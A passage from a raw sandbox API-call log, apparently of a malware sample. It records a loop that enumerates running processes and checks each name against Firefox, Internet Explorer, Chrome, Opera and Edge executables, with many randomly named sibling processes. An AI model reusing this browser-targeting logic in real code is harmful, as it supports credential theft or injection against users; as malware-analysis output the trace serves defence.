th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.704] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.704] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.704] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.704] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0198.704] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.704] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.705] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.705] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.705] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.705] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0198.705] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.705] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.705] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.705] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.705] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.705] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0198.705] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.705] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.706] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.706] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.706] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.706] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0198.706] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.706] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0198.706] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0198.706] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0198.706] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0198.706] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0198.706] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.706] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.707] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.707] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.707] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.707] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0198.707] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.707] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.708] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.708] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.708] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.708] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0198.708] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.708] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0198.708] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0198.708] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0198.708] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0198.708] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0198.708] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.708] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0198.709] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0198.709] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0198.709] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0198.709] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0198.709] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.709] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0198.710] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0198.710] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0198.710] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0198.710] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0198.710] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.710] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.710] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.710] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.710] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.710] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0198.710] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.710] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0198.711] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0198.711] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0198.711] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0198.711] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0198.711] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.711] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0198.711] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0198.711] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0198.711] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0198.711] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0198.711] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.711] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0198.712] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0198.712] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0198.712] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0198.712] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0198.712] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.712] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0198.713] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0198.713] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0198.713] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0198.713] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0198.713] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.713] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0198.713] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0198.713] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0198.713] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0198.713] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0198.713] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.713] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0198.714] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0198.714] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0198.714] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0198.714] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0198.714] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.714] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0198.714] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0198.714] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0198.714] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0198.714] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0198.714] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.714] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0198.715] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0198.715] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0198.715] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0198.715] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0198.715] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.715] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0198.716] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0198.716] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0198.716] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0198.716] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0198.716] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.716] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0198.716] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0198.716] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0198.716] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0198.716] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0198.716] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.716] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0198.717] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0198.717] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0198.717] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0198.717] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0198.717] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.717] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0198.718] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0198.718] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0198.718] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0198.718] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0198.718] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.718] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0198.718] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0198.718] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0198.718] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0198.718] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0198.718] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.718] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0198.719] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0198.719] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0198.719] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0198.719] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0198.719] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.719] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0198.719] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0198.719] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0198.719] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0198.719] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0198.719] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.719] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0198.720] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0198.720] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0198.720] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0198.720] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0198.720] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.720] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0198.721] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0198.721] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0198.721] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0198.721] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0198.721] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.721] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0198.721] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0198.721] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0198.721] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0198.721] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0198.721] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.721] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0198.722] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0198.722] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0198.722] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0198.722] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0198.722] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.722] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0198.722] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0198.723] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0198.723] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0198.723] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0198.723] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.723] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0198.723] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0198.723] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0198.723] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0198.723] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0198.723] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0198.723] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0198.724] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0198.724] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0198.724] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0198.724] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0198.724] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.724] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0198.724] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0198.724] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0198.724] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0198.724] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0198.724] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.724] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.725] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.725] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0198.725] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0198.725] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0198.725] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.725] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0198.725] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0198.725] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0198.726] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0198.726] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0198.726] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0198.726] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.726] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0198.726] lstrcmpiA 